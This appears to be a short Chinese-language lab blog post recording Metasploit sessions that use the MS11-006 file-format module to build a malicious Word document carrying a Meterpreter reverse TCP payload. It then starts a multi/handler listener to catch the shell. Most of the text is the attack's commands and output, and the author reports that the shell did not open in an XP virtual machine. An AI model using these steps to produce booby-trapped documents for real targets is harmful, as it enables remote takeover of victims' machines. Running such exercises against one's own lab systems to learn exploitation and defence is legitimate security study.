metasploit文件格式漏洞渗透攻击(成功生成doc)

因为BT5R3失败了,所以现在换成了BT5R1。

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > 

生成了msf.doc,把这个文件复制到XP虚拟机里。

然后,在BT5里输入命令:

msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > 

我打开msf.doc,但是BT5没有成功打开shell。可能不是英文的缘故吧。明天换个英文的XP试试。

你可能感兴趣的:(metasploit文件格式漏洞渗透攻击(成功生成doc))